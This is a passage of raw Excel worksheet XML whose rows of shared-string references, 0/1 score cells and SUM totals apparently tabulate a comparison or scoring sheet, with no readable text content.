    <row r="15" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>203</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>204</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>222</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>222</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>12</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>29</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>30</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>30</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>205</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>206</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>206</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>207</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>208</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>208</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>208</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>209</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>210</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>210</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>210</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>200</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>200</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>200</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>211</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>212</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>1330</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>1329</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>200</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>200</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>200</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>203</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>204</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>1329</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>0</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>222</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>213</v>
      </c>
      <c r="B24" s="3"/>
      <c r="F24" s="3"/>
    </row>
    <row r="25" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A25" s="18" t="s">
        <v>41</v>
      </c>
      <c r="C25" s="18"/>
      <c r="D25" s="6">
        <f>SUM(D4:D24)</f>
        <v>18</v>
      </c>
      <c r="E25" s="6">
        <f t="shared" ref="E25:H25" si="0">SUM(E4:E24)</f>
        <v>15</v>
      </c>
      <c r="G25" s="6">
        <f t="shared" si="0"/>
        <v>19</v>
      </c>
      <c r="H25" s="6">
        <f t="shared" si="0"/>
        <v>15</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A28" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B28" s="25"/>
      <c r="C28" s="25"/>
      <c r="D28" s="25"/>
      <c r="E28" s="25"/>
      <c r="F28" s="25"/>
      <c r="G28" s="25"/>
      <c r="H28" s="25"/>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B29" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C29" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D29" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E29" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F29" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G29" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H29" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="27" t="s">
        <v>1210</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>1130</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="27"/>
      <c r="B33" s="3" t="s">
        <v>1236</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1236</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1236</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>1211</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>60</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="27" t="s">
        <v>1212</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1238</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>0</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1263</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="27"/>
      <c r="B36" s="3" t="s">
        <v>1123</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1237</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>0</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1262</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A37" s="27" t="s">
        <v>1213</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1240</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1265</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A38" s="27"/>
      <c r="B38" s="3" t="s">
        <v>1239</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1239</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1264</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="27" t="s">
        <v>1214</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A40" s="27"/>
      <c r="B40" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>1215</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>1216</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1217</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1259</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="27" t="s">
        <v>1214</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A43" s="27"/>
      <c r="B43" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="27" t="s">
        <v>1218</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1243</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1245</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1243</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="27"/>
      <c r="B45" s="3" t="s">
        <v>1242</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1244</v>
      </c>
      <c r="D45">
        <v>1</v>
      </c>
      <c r="E45">
        <v>0</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1266</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>1219</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>1220</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1220</v>
      </c>
      <c r="D46">
        <v>1</v>
      </c>
      <c r="E46">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1260</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>1221</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>1222</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1223</v>
      </c>
      <c r="D47">
        <v>1</v>
      </c>
      <c r="E47">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1261</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A48" s="27" t="s">
        <v>1224</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>1247</v>
      </c>
      <c r="C48" s="9" t="s">
        <v>1250</v>
      </c>
      <c r="D48">
        <v>1</v>
      </c>
      <c r="E48">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>1249</v>
      </c>
      <c r="G48">
        <v>1</v>
      </c>
      <c r="H48">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A49" s="27"/>
      <c r="B49" s="3" t="s">
        <v>1246</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>1248</v>
      </c>
      <c r="D49">
        <v>1</v>
      </c>
      <c r="E49">
        <v>0</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1267</v>
      </c>
      <c r="G49">
        <v>1</v>
      </c>
      <c r="H49">
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A50" s="27" t="s">
        <v>1225</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1252</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>1254</v>
      </c>
      <c r="D50">
        <v>1</v>
      </c>
      <c r="E50">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>1268</v>
      </c>
      <c r="G50">
        <v>1</v>
      </c>
      <c r="H50">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A51" s="27"/>
      <c r="B51" s="3" t="s">
        <v>1251</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1253</v>
      </c>
      <c r="D51">
        <v>1</v>
      </c>
      <c r="E51">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1251</v>
      </c>
      <c r="G51">
        <v>1</v>
      </c>
      <c r="H51">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A52" s="3" t="s">
        <v>1226</v>
      </c>
      <c r="B52" s="3" t="s">
        <v>1227</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>1228</v>
      </c>
      <c r="D52">
        <v>1</v>
      </c>
      <c r="E52">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1227</v>
      </c>
      <c r="G52">
        <v>1</v>
      </c>
      <c r="H52">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A53" s="27" t="s">
        <v>1214</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G53">
        <v>1</v>
      </c>
      <c r="H53">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A54" s="27"/>
      <c r="B54" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="G54">
        <v>1</v>
      </c>
      <c r="H54">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>1044</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="D55">
        <v>1</v>
      </c>
      <c r="E55">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="G55">
        <v>1</v>
      </c>
      <c r="H55">
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>1229</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>1230</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>1230</v>
      </c>
      <c r="D56">
        <v>1</v>
      </c>
      <c r="E56">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>1230</v>
      </c>
      <c r="G56">
        <v>1</v>
      </c>
      <c r="H56">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A57" s="27" t="s">
        <v>1231</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>1256</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>1904</v>
      </c>
      <c r="D57">
        <v>0</v>
      </c>
      <c r="E57">
        <v>1</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>1257</v>
      </c>
      <c r="G57">
        <v>1</v>
      </c>
      <c r="H57">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A58" s="27"/>
      <c r="B58" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="D58">
        <v>1</v>
      </c>
      <c r="E58">
        <v>1</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="G58">
        <v>1</v>
      </c>
      <c r="H58">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A59" s="27" t="s">
        <v>1232</v>
      </c>
      <c r="B59" s="3" t="s">
        <v>1258</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1233</v>
      </c>
      <c r="D59">
        <v>1</v>
      </c>
      <c r="E59">
        <v>1</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1269</v>
      </c>
      <c r="G59">
        <v>1</v>
      </c>
      <c r="H59">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A60" s="27"/>
      <c r="B60" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="D60">
        <v>0</v>
      </c>
      <c r="E60">
        <v>0</v>
      </c>
      <c r="F60" s="3" t="s">
        <v>1141</v>
      </c>
      <c r="G60">
        <v>1</v>
      </c>
      <c r="H60">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:8" ht="110.4" x14ac:dyDescent="0.25">
      <c r="A61" s="3" t="s">
        <v>1234</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>1235</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>1235</v>
      </c>
      <c r="D61">
        <v>1</v>
      </c>
      <c r="E61">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>1235</v>
      </c>
      <c r="G61">
        <v>1</v>
      </c>
      <c r="H61">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A62" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D62" s="6">
        <f>SUM(D30:D61)</f>
        <v>30</v>
      </c>
      <c r="E62" s="6">
        <f t="shared" ref="E62:H62" si="1">SUM(E30:E61)</f>
        <v>27</v>
      </c>
      <c r="F62" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G62" s="6">
        <f t="shared" si="1"/>
        <v>32</v>
      </c>
      <c r="H62" s="6">
        <f t="shared" si="1"/>
        <v>26</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="14">
    <mergeCell ref="A37:A38"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A28:H28"/>
    <mergeCell ref="A32:A33"/>
    <mergeCell ref="A35:A36"/>
    <mergeCell ref="A57:A58"/>
    <mergeCell ref="A59:A60"/>
    <mergeCell ref="A39:A40"/>
    <mergeCell ref="A42:A43"/>
    <mergeCell ref="A44:A45"/>
    <mergeCell ref="A48:A49"/>
    <mergeCell ref="A50:A51"/>
    <mergeCell ref="A53:A54"/>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C18A5-3EC2-4A05-8F1F-DD1C0798BFD3}">
  <dimension ref="A1:H56"/>
  <sheetViews>
    <sheetView topLeftCell="A46" workbookViewId="0">
      <selection activeCell="H54" sqref="H54"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="21.33203125" customWidth="1"/>
    <col min="2" max="2" width="28.33203125" customWidth="1"/>
    <col min="3" max="3" width="28.88671875" customWidth="1"/>
    <col min="4" max="4" width="10.88671875" customWidth="1"/>
    <col min="5" max="5" width="10.33203125" customWidth="1"/>
    <col min="6" max="6" width="27.5546875" customWidth="1"/>
    <col min="7" max="7" width="11.21875" customWidth="1"/>
    <col min="8" max="8" width="11" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="22.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>223</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x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>186</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>187</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>187</v>
      </c>
      <c r="D4" s="3">
        <v>1</v>
      </c>
      <c r="E4" s="3">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>187</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>224</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>225</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>225</v>
      </c>
      <c r="D5" s="3">
        <v>1</v>
      </c>
      <c r="E5" s="3">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>225</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>226</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>227</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>227</v>
      </c>
      <c r="D6" s="3">
        <v>1</v>
      </c>
      <c r="E6" s="3">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>227</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>228</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>229</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>229</v>
      </c>
      <c r="D7" s="3">
        <v>1</v>
      </c>
      <c r="E7" s="3">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>229</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>230</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>231</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>231</v>
      </c>
      <c r="D8" s="3">
        <v>1</v>
      </c>
      <c r="E8" s="3">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>231</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>232</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>233</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>233</v>
      </c>
      <c r="D9" s="3">
        <v>1</v>
      </c>
      <c r="E9" s="3">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>233</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>234</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>235</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>235</v>
      </c>
      <c r="D10" s="3">
        <v>1</v>
      </c>
      <c r="E10" s="3">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>235</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>236</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>237</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>237</v>
      </c>
      <c r="D11" s="3">
        <v>1</v>
      </c>
      <c r="E11" s="3">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>237</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>238</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>239</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>1906</v>
      </c>
      <c r="D12" s="3">
        <v>0</v>
      </c>
      <c r="E12" s="3">
        <v>0</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>259</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12" s="3">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>197</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>198</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>198</v>
      </c>
      <c r="D13" s="3">
        <v>1</v>
      </c>
      <c r="E13" s="3">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>198</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13" s="3">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>240</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>241</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>241</v>
      </c>
